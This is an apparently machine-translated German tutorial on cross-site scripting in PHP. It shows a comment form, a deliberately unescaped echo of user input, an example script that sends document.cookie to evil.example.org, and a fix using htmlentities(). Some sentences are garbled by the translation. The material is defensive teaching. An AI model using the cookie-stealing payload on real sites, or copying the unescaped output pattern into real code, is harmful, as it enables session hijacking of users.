Cross-Site-Scripting-Angriff ist einer der bekannte Angriffsmethoden ein. Webanwendungen auf allen Plattformen sind von diesem Problem betroffen, und PHP-Anwendungen bilden da keine Ausnahme.
Alle Anwendungen mit Eingaben sind gefährdet. Webmail, Foren, Gästebücher und sogar Blogs. Tatsächlich stellen die meisten Webanwendungen Eingaben zur Verfügung, um mehr Menschen anzulocken, aber gleichzeitig setzen sie sich dadurch auch einem Risiko aus. Cross-Site-Scripting-Schwachstellen treten auf, wenn Eingaben nicht ordnungsgemäß bereinigt und maskiert werden.
Nehmen Sie als Beispiel eine Anwendung, die die Eingabe von Kommentaren auf jeder Seite ermöglicht. Sie verwendet das folgende Formular, um Benutzern beim Senden zu helfen:
CODE:
<form action="comment.php" method="POST" /> <p>Name: <input type="text" name="name" /><br /> Comment: <textarea name="comment" rows="10" cols="60"></textarea><br /> <input type="submit" value="Add Comment" /></p> </form>
Das Programm besucht diese Seite zu andere Benutzer zeigen Kommentare. Beispielsweise könnte ein Codeausschnitt wie der folgende verwendet werden, um einen Kommentar ($comment) und seinen entsprechenden Autor ($name) auszugeben:
CODE:
<?php echo "<p>$name writes:<br />"; echo "<blockquote>$comment</blockquote></p>"; ?>
Dieser Prozess berücksichtigt vollständig die Werte von $comment und $ Stellen Sie sich beim Namen Trust vor, dass der Inhalt eines von ihnen den folgenden Code enthält:
CODE:
<script> document.location = 'http://evil.example.org/steal.php?cookies=' + document.cookie </script>
Wenn Ihre Benutzer diesen Kommentar sehen, ist das dasselbe, als würden Sie anderen erlauben, Javascript-Code zu Ihrem Website-Quellprogramm hinzuzufügen. Ihre Benutzer senden ihre Cookies unwissentlich an evil.example.org und das empfangende Programm (steal.php) kann über die Variable $_GET['cookies'] auf alle Cookies zugreifen.
Dies ist ein häufiger Fehler, der meist durch schlechte Programmiergewohnheiten verursacht wird. Glücklicherweise sind solche Fehler leicht zu vermeiden. Da dieses Risiko nur auftritt, wenn Sie kontaminierte Daten ausgeben, stellen Sie einfach sicher, dass Sie die Eingabe filtern und die Ausgabe maskieren, wie in Kapitel 1 beschrieben.
Zumindest Sie verwenden htmlentities( ), um alle Daten zu maskieren, die Sie an den Client ausgeben möchten. Diese Funktion kann alle Sonderzeichen in eine HTML-Darstellung umwandeln. Nachdem alle Zeichen konvertiert wurden, die den Browser zu einer speziellen Verarbeitung veranlassen, kann sichergestellt werden, dass der ursprünglich eingegebene Inhalt angezeigt wird.
Daher ist es sicherer, den folgenden Code zum Anzeigen von Kommentaren zu verwenden:
CODE:
<?php $clean = array(); $html = array(); /* Filter Input ($name, $comment) */ $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8'); $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8'); echo "<p>{$html['name']} writes:<br />"; echo "<blockquote>{$html['comment']}</blockquote></p>"; ?>
Das Obige ist der Inhalt des PHP-Sicherheits-Cross-Site-Scripting-Angriffs. Weitere verwandte Inhalte finden Sie hier die chinesische PHP-Website (www.php.cn)!